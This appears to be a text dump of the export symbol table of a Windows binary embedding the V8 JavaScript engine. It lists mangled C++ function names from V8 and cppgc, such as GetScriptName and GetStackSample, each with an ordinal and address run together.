                                                                                                                                                                                                                                    ?GetRecentAllocationSpeedInBytesPerMs@StatsCollector@internal@cppgc@@QEBANXZ78800x140509490
                                                                                                                                                                                                                                    ?GetRecordWriteStub@WasmCode@wasm@internal@v8@@SA?AW4RuntimeStubId@1234@W4RememberedSetAction@34@W4SaveFPRegsMode@34@@Z78810x140540c00
                                                                                                                                                                                                                                    ?GetRecoveredTrapCount@trap_handler@internal@v8@@YA_KXZ78820x1407200f0
                                                                                                                                                                                                                                    ?GetRegisterCountOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z78830x140a537b0
                                                                                                                                                                                                                                    ?GetRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z78840x140a38320
                                                                                                                                                                                                                                    ?GetRegisterInfoTableIndex@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEBA_KVRegister@234@@Z78850x140a38340
                                                                                                                                                                                                                                    ?GetRegisterListOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegisterList@234@H@Z78860x140a537f0
                                                                                                                                                                                                                                    ?GetRegisterOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@H@Z78870x140a538a0
                                                                                                                                                                                                                                    ?GetRegisterOperandRange@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z78880x140a53910
                                                                                                                                                                                                                                    ?GetRegisterPairOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AU?$pair@VRegister@interpreter@internal@v8@@V1234@@std@@H@Z78890x140a53970
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78900x1405f7d70
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78910x1405f7d70
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78920x1405f7d70
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78930x1405f7d70
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78940x1405f7dc0
                                                                                                                                                                                                                                    ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z78950x1405f7de0
                                                                                                                                                                                                                                    ?GetRegisterParameter@CallInterfaceDescriptor@internal@v8@@QEBA?AVRegister@23@H@Z78960x14057f5c0
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ78970x1405f7e00
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ78980x1405f7e00
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ78990x1405f7e60
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ79000x1405f7e00
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ79010x1405f7ec0
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ79020x1405f7f60
                                                                                                                                                                                                                                    ?GetRegisterParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ79030x1403dd6d0
                                                                                                                                                                                                                                    ?GetRegisteredHeapsForTesting@HeapRegistry@internal@cppgc@@SAAEBV?$vector@PEAVHeapBase@internal@cppgc@@V?$allocator@PEAVHeapBase@internal@cppgc@@@std@@@std@@XZ79040x14050b050
                                                                                                                                                                                                                                    ?GetRelativeJumpTargetOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHXZ79050x140a539f0
                                                                                                                                                                                                                                    ?GetRename@InstructionSelector@compiler@internal@v8@@AEAAHH@Z79060x14105de90
                                                                                                                                                                                                                                    ?GetReplace@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z79070x140c88550
                                                                                                                                                                                                                                    ?GetReplacementHigh@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z79080x1410f07d0
                                                                                                                                                                                                                                    ?GetReplacementLow@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z79090x1410f07f0
                                                                                                                                                                                                                                    ?GetRepresentation@InstructionSequence@compiler@internal@v8@@QEBA?AW4MachineRepresentation@34@H@Z79100x1410322e0
                                                                                                                                                                                                                                    ?GetRepresentationFor@RepresentationChanger@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z79110x141256030
                                                                                                                                                                                                                                    ?GetResourceName@Script@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ79120x140c88560
                                                                                                                                                                                                                                    ?GetResourceName@ScriptOrModule@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ79130x140c88640
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ79140x1400a7da0
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ79150x140098ae0
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ79160x140098ae0
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ79170x140098ae0
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ79180x140098ae0
                                                                                                                                                                                                                                    ?GetReturnCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ79190x140098ae0
                                                                                                                                                                                                                                    ?GetReturnCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ79200x1403dd540
                                                                                                                                                                                                                                    ?GetReturnHandler@HandlerTable@internal@v8@@AEBAHH@Z79210x140bf99d0
                                                                                                                                                                                                                                    ?GetReturnLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z79220x14057f5e0
                                                                                                                                                                                                                                    ?GetReturnLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z79230x14057f600
                                                                                                                                                                                                                                    ?GetReturnOffset@HandlerTable@internal@v8@@AEBAHH@Z79240x140bf99f0
                                                                                                                                                                                                                                    ?GetReturnSlotCount@Frame@compiler@internal@v8@@QEBAHXZ79250x140097580
                                                                                                                                                                                                                                    ?GetReturnType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z79260x14057f620
                                                                                                                                                                                                                                    ?GetReturnType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z79270x14057f640
                                                                                                                                                                                                                                    ?GetReturnType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z79280x14057f660
                                                                                                                                                                                                                                    ?GetRoot@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@XZ79290x1400978d0
                                                                                                                                                                                                                                    ?GetRoot@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z79300x140540c30
                                                                                                                                                                                                                                    ?GetRootForNonJSReceiver@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z79310x140933c20
                                                                                                                                                                                                                                    ?GetRuntimeCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@W4FunctionId@Runtime@34@HV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z79320x14102c160
                                                                                                                                                                                                                                    ?GetRuntimeIdOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z79330x140a53570
                                                                                                                                                                                                                                    ?GetRuntimeStubId@NativeModule@wasm@internal@v8@@QEBA?AW4RuntimeStubId@WasmCode@234@_K@Z79340x1406624b0
                                                                                                                                                                                                                                    ?GetSFIFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVSharedFunctionInfo@23@H@Z79350x1408f5460
                                                                                                                                                                                                                                    ?GetSONAME@Version@internal@v8@@SAXV?$Vector@D@base@3@@Z79360x1407ba1d0
                                                                                                                                                                                                                                    ?GetSample@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@H@Z79370x140c886e0
                                                                                                                                                                                                                                    ?GetSampleEmbedderState@CpuProfile@v8@@QEBA?AW4EmbedderStateTag@2@H@Z79380x140c88700
                                                                                                                                                                                                                                    ?GetSampleState@CpuProfile@v8@@QEBA?AW4StateTag@2@H@Z79390x140c88730
                                                                                                                                                                                                                                    ?GetSampleTimestamp@CpuProfile@v8@@QEBA_JH@Z79400x140c88750
                                                                                                                                                                                                                                    ?GetSamplesCount@CpuProfile@v8@@QEBAHXZ79410x1404391f0
                                                                                                                                                                                                                                    ?GetScopeName@StatsCollector@internal@cppgc@@CAPEBDW4ConcurrentScopeId@123@W4CollectionType@MarkingConfig@MarkerBase@23@@Z79420x140507860
                                                                                                                                                                                                                                    ?GetScopeName@StatsCollector@internal@cppgc@@CAPEBDW4ScopeId@123@W4CollectionType@MarkingConfig@MarkerBase@23@@Z79430x1405078c0
                                                                                                                                                                                                                                    ?GetScript@ScriptData@Coverage@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ79440x140bcb7b0
                                                                                                                                                                                                                                    ?GetScript@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ79450x140bcb7b0
                                                                                                                                                                                                                                    ?GetScriptColumn@CodeEvent@v8@@QEAAHXZ79460x140370670
                                                                                                                                                                                                                                    ?GetScriptColumnNumber@Function@v8@@QEBAHXZ79470x140c88790
                                                                                                                                                                                                                                    ?GetScriptData@Coverage@debug@v8@@QEBA?AVScriptData@123@_K@Z79480x140bcb7c0
                                                                                                                                                                                                                                    ?GetScriptData@TypeProfile@debug@v8@@QEBA?AVScriptData@123@_K@Z79490x140bcb7c0
                                                                                                                                                                                                                                    ?GetScriptId@CpuProfileNode@v8@@QEBAHXZ79500x140c888c0
                                                                                                                                                                                                                                    ?GetScriptId@StackFrame@v8@@QEBAHXZ79510x140c888d0
                                                                                                                                                                                                                                    ?GetScriptLine@CodeEvent@v8@@QEAAHXZ79520x140464c90
                                                                                                                                                                                                                                    ?GetScriptLineNumber@Function@v8@@QEBAHXZ79530x140c88910
                                                                                                                                                                                                                                    ?GetScriptName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ79540x140097a50
                                                                                                                                                                                                                                    ?GetScriptName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79550x140c88a40
                                                                                                                                                                                                                                    ?GetScriptName@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ79560x140c88b30
                                                                                                                                                                                                                                    ?GetScriptNameOrSourceURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79570x140c88c30
                                                                                                                                                                                                                                    ?GetScriptOrigin@Function@v8@@QEBA?AVScriptOrigin@2@XZ79580x140c88d30
                                                                                                                                                                                                                                    ?GetScriptOrigin@Message@v8@@QEBA?AVScriptOrigin@2@XZ79590x140c88ec0
                                                                                                                                                                                                                                    ?GetScriptResourceName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79600x140c89100
                                                                                                                                                                                                                                    ?GetScriptResourceName@Message@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ79610x140c89160
                                                                                                                                                                                                                                    ?GetScriptResourceNameStr@CpuProfileNode@v8@@QEBAPEBDXZ79620x140c89190
                                                                                                                                                                                                                                    ?GetScriptScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ79630x140c652a0
                                                                                                                                                                                                                                    ?GetScriptSource@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79640x140c891a0
                                                                                                                                                                                                                                    ?GetScriptSourceMappingURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79650x140c89300
                                                                                                                                                                                                                                    ?GetSearch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z79660x140c893f0
                                                                                                                                                                                                                                    ?GetSecurityToken@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ79670x140c89400
                                                                                                                                                                                                                                    ?GetSentinelSegmentAddress@SegmentBase@internal@base@heap@@SAPEAV1234@XZ79680x140520110
                                                                                                                                                                                                                                    ?GetSerializedNativeModuleSize@WasmSerializer@wasm@internal@v8@@QEBA_KXZ79690x14061dd70
                                                                                                                                                                                                                                    ?GetShallowSize@HeapGraphNode@v8@@QEBA_KXZ79700x140c89580
                                                                                                                                                                                                                                    ?GetSharedArrayBufferFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VSharedArrayBuffer@v8@@@3@PEAVIsolate@3@I@Z79710x140c895a0
                                                                                                                                                                                                                                    ?GetSharedArrayBufferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VSharedArrayBuffer@v8@@@3@@Z79720x140c89660
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@93@W4NativesFlag@23@@Z79730x140c064c0
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForScriptWithCachedData@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAVAlignedCachedData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@W4NativesFlag@23@@Z79740x140c06b30
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForScriptWithDeserializeTask@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAVBackgroundDeserializeTask@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@W4NativesFlag@23@@Z79750x140c06b90
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForScriptWithExtension@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAVExtension@3@W4CompileOptions@ScriptCompiler@3@W4NativesFlag@23@@Z79760x140c06bf0
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForStreamedScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAUScriptStreamingData@23@@Z79770x140c06c40
                                                                                                                                                                                                                                    ?GetSharedFunctionInfoForWebSnapshot@Compiler@internal@v8@@SA?AV?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@V?$MaybeHandle@VObject@internal@v8@@@23@@Z79780x140c07300
                                                                                                                                                                                                                                    ?GetSharedLibraryAddresses@OS@base@v8@@SA?AV?$vector@USharedLibraryAddress@OS@base@v8@@V?$allocator@USharedLibraryAddress@OS@base@v8@@@std@@@std@@XZ79790x140ff4260
                                                                                                                                                                                                                                    ?GetSharedMemoryStatistics@V8@v8@@SAXPEAVSharedMemoryStatistics@2@@Z79800x140c89730
                                                                                                                                                                                                                                    ?GetSharedValueFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VValue@v8@@@3@PEAVIsolate@3@I@Z79810x140c895a0
                                                                                                                                                                                                                                    ?GetSharedValueId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VValue@v8@@@3@@Z79820x140c89660
                                                                                                                                                                                                                                    ?GetShortBuiltinsCallRegion@Isolate@internal@v8@@SA?AVAddressRegion@base@3@XZ79830x140b6b100
                                                                                                                                                                                                                                    ?GetSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAPEBV?$Signature@VValueType@wasm@internal@v8@@@34@I@Z79840x140634f60
                                                                                                                                                                                                                                    ?GetSignedOperand@BytecodeArrayIterator@interpreter@internal@v8@@AEBAHHW4OperandType@234@@Z79850x140a53ad0
                                                                                                                                                                                                                                    ?GetSimpleStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z79860x140b6b160
                                                                                                                                                                                                                                    ?GetSimpleTargetDetails@TransitionsAccessor@internal@v8@@AEAA?AVPropertyDetails@23@VMap@23@@Z79870x140540f20
                                                                                                                                                                                                                                    ?GetSimpleTransition@TransitionsAccessor@internal@v8@@CA?AVMap@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z79880x1408d44d0
                                                                                                                                                                                                                                    ?GetSimpleTransitionKey@TransitionsAccessor@internal@v8@@CA?AVName@23@VMap@23@@Z79890x140540f50
                                                                                                                                                                                                                                    ?GetSimplifiedCDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEBV?$Signature@VMachineType@internal@v8@@@34@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z79900x1410e0d50
                                                                                                                                                                                                                                    ?GetSingle@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z79910x140b7bc30
                                                                                                                                                                                                                                    ?GetSlotAboveSPBeforeTailCall@CodeGenerator@compiler@internal@v8@@AEAA_NPEAVInstruction@234@PEAH@Z79920x14106e060
                                                                                                                                                                                                                                    ?GetSlotOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVFeedbackSlot@34@H@Z79930x140a53b20
                                                                                                                                                                                                                                    ?GetSmiConstant@TurboAssembler@internal@v8@@IEAA?AVRegister@23@VSmi@23@@Z79940x1405f7fc0
                                                                                                                                                                                                                                    ?GetSnapshotCount@HeapProfiler@v8@@QEAAHXZ79950x140c89740
                                                                                                                                                                                                                                    ?GetSource@JSMessageObject@internal@v8@@QEBA?AVString@23@XZ79960x140962550
                                                                                                                                                                                                                                    ?GetSource@Message@v8@@QEBA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z79970x140c89750
                                                                                                                                                                                                                                    ?GetSource@RegExp@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ79980x140c89990
                                                                                                                                                                                                                                    ?GetSourceBreakLocations@Debug@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z79990x140bbb970
                                                                                                                                                                                                                                    ?GetSourceLine@Message@v8@@QEBA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z80000x140c89a10
                                                                                                                                                                                                                                    ?GetSourceLine@WasmModuleSourceMap@wasm@internal@v8@@QEBA_K_K@Z80010x140630ce0
                                                                                                                                                                                                                                    ?GetSourceLineNumber@SourcePositionTable@internal@v8@@QEBAHH@Z80020x140866d30
                                                                                                                                                                                                                                    ?GetSourceLocation@Script@debug@v8@@QEBA?AVLocation@23@H@Z80030x140bcb810
                                                                                                                                                                                                                                    ?GetSourceMappingURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ80040x140c89c20
                                                                                                                                                                                                                                    ?GetSourceOffset@ModuleRequest@v8@@QEBAHXZ80050x140543560
                                                                                                                                                                                                                                    ?GetSourceOffset@Script@debug@v8@@QEBAHAEBVLocation@23@@Z80060x140bcb8b0
                                                                                                                                                                                                                                    ?GetSourcePosition@AsmJsOffsetInformation@wasm@internal@v8@@QEAAHHH_N@Z80070x14062edb0
                                                                                                                                                                                                                                    ?GetSourcePosition@InstructionSequence@compiler@internal@v8@@QEBA_NPEBVInstruction@234@PEAVSourcePosition@34@@Z80080x141032340
                                                                                                                                                                                                                                    ?GetSourcePosition@SourcePositionTable@compiler@internal@v8@@QEBA?AVSourcePosition@34@PEAVNode@234@@Z80090x1410dd380
                                                                                                                                                                                                                                    ?GetSourcePositionBefore@WasmCode@wasm@internal@v8@@QEAAHH@Z80100x1406628f0
                                                                                                                                                                                                                                    ?GetSourcePositionTable@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@base@4@XZ80110x14106e130
                                                                                                                                                                                                                                    ?GetSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@HV?$allocator@H@std@@@std@@XZ80120x1409ab700
                                                                                                                                                                                                                                    ?GetSourceType@CpuProfileNode@v8@@QEBA?AW4SourceType@12@XZ80130x140c89d20
                                                                                                                                                                                                                                    ?GetSourceURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ80140x140c89d30
                                                                                                                                                                                                                                    ?GetSpaceName@BaseSpace@internal@v8@@SAPEBDW4AllocationSpace@23@@Z80150x140b48df0
                                                                                                                                                                                                                                    ?GetSpecifier@ModuleRequest@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ80160x140bcd360
                                                                                                                                                                                                                                    ?GetSpeculationMode@FeedbackNexus@internal@v8@@QEAA?AW4SpeculationMode@23@XZ80170x1409ab9b0
                                                                                                                                                                                                                                    ?GetSpillMoveInsertionLocations@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAUSpillMoveInsertionList@1234@PEBVTopTierRegisterAllocationData@234@@Z80180x140097e40
                                                                                                                                                                                                                                    ?GetSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVInstructionOperand@234@XZ80190x140097e30
                                                                                                                                                                                                                                    ?GetSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ80200x140097e30
                                                                                                                                                                                                                                    ?GetSpillRangeOperand@TopLevelLiveRange@compiler@internal@v8@@QEBA?AVAllocatedOperand@234@XZ80210x14110eac0
                                                                                                                                                                                                                                    ?GetSpillSlotCount@Frame@compiler@internal@v8@@QEBAHXZ80220x140097a70
                                                                                                                                                                                                                                    ?GetSplit@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z80230x140c89e30
                                                                                                                                                                                                                                    ?GetStackArgumentOrder@CallDescriptor@compiler@internal@v8@@QEBA?AW4StackArgumentOrder@34@XZ80240x1403be620
                                                                                                                                                                                                                                    ?GetStackArgumentOrder@CallInterfaceDescriptor@internal@v8@@QEBA?AW4StackArgumentOrder@23@XZ80250x14057f680
                                                                                                                                                                                                                                    ?GetStackCheckOffset@CodeGenerator@compiler@internal@v8@@QEAAIXZ80260x14106e150
                                                                                                                                                                                                                                    ?GetStackDepth@DebugInfo@wasm@internal@v8@@QEAAH_K@Z80270x140658710
                                                                                                                                                                                                                                    ?GetStackIndexFromSlot@CallDescriptor@compiler@internal@v8@@QEBAHH@Z80280x14057f690
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ80290x1405f8030
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ80300x1405f8030
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ80310x1405f80a0
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ80320x1405f8030
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ80330x1405f8110
                                                                                                                                                                                                                                    ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ80340x1405f81b0
                                                                                                                                                                                                                                    ?GetStackParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ80350x14057f6b0
                                                                                                                                                                                                                                    ?GetStackParameterDelta@CallDescriptor@compiler@internal@v8@@QEBAHPEBV1234@@Z80360x14102c1f0
                                                                                                                                                                                                                                    ?GetStackSample@Isolate@v8@@QEAAXAEBURegisterState@2@PEAPEAX_KPEAUSampleInfo@2@@Z80370x140c89e40
                                                                                                                                                                                                                                    ?GetStackSample@TickSample@internal@v8@@SA_NPEAVIsolate@23@PEAURegisterState@3@W4RecordCEntryFrame@123@PEAPEAX_KPEAUSampleInfo@3@PEAW4StateTag@3@_N@Z80380x14085d530
                                                                                                                                                                                                                                    ?GetStackStart@Stack@base@v8@@SA?AUStackSlot@123@XZ80390x140ff44b0
                                                                                                                                                                                                                                    ?GetStackTrace@Exception@v8@@SA?AV?$Local@VStackTrace@v8@@@2@V?$Local@VValue@v8@@@2@@Z80400x140c89f30
                                                                                                                                                                                                                                    ?GetStackTrace@Message@v8@@QEBA?AV?$Local@VStackTrace@v8@@@2@XZ80410x140c89fc0
                                                                                                                                                                                                                                    ?GetStackValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@H_K00PEAVIsolate@34@@Z80420x140658760
                                                                                                                                                                                                                                    ?GetStartColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z80430x140c8a220
                                                                                                                                                                                                                                    ?GetStartColumn@Message@v8@@QEBAHXZ80440x140c8a240
                                                                                                                                                                                                                                    ?GetStartPosition@Message@v8@@QEBAHXZ80450x140c8a3b0
                                                                                                                                                                                                                                    ?GetStartTime@CpuProfile@v8@@QEBA_JXZ80460x140c8a520
                                                                                                                                                                                                                                    ?GetState@EmbedderState@internal@v8@@QEBA?AW4EmbedderStateTag@3@XZ80470x1405342d0
                                                                                                                                                                                                                                    ?GetState@SourcePositionTableIterator@internal@v8@@QEBA?AUIndexAndPositionState@123@XZ80480x140540ff0
                                                                                                                                                                                                                                    ?GetStatus@Module@v8@@QEBA?AW4Status@12@XZ80490x140c8a540
                                                                                                                                                                                                                                    ?GetStdoutMutex@StdoutStream@internal@v8@@CAPEAVRecursiveMutex@base@3@XZ80500x1407bb2e0
                                                                                                                                                                                                                                    ?GetStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z80510x140541020
                                                                                                                                                                                                                                    ?GetStreamingCompilationOwnership@WasmEngine@wasm@internal@v8@@QEAA_N_K@Z80520x14064dea0
                                                                                                                                                                                                                                    ?GetString@Version@internal@v8@@SAXV?$Vector@D@base@3@@Z80530x1407ba2a0
                                                                                                                                                                                                                                    ?GetStringCountForTesting@StringsStorage@internal@v8@@QEBA_KXZ80540x140097a30
                                                                                                                                                                                                                                    ?GetStringId@WebSnapshotSerializer@internal@v8@@AEAAIV?$Handle@VString@internal@v8@@@23@AEA_N@Z80550x1407b5240
                                                                                                                                                                                                                                    ?GetStringMigrationSentinelMap@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4InstanceType@23@@Z80560x140b34a00
                                                                                                                                                                                                                                    ?GetStringMigrationSentinelMap@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4InstanceType@23@@Z80570x140b34a50
                                                                                                                                                                                                                                    ?GetStringOption@internal@v8@@YA?AV?$Maybe@_N@2@PEAVIsolate@12@V?$Handle@VJSReceiver@internal@v8@@@12@PEBDV?$vector@PEBDV?$allocator@PEBD@std@@@std@@2PEAV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@7@@Z80580x1408fc460
                                                                                                                                                                                                                                    ?GetStringSize@StringsStorage@internal@v8@@QEAA_KXZ80590x14085e8c0
                                                                                                                                                                                                                                    ?GetStrongCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVCrossThreadPersistentRegion@23@XZ80600x14050bb50
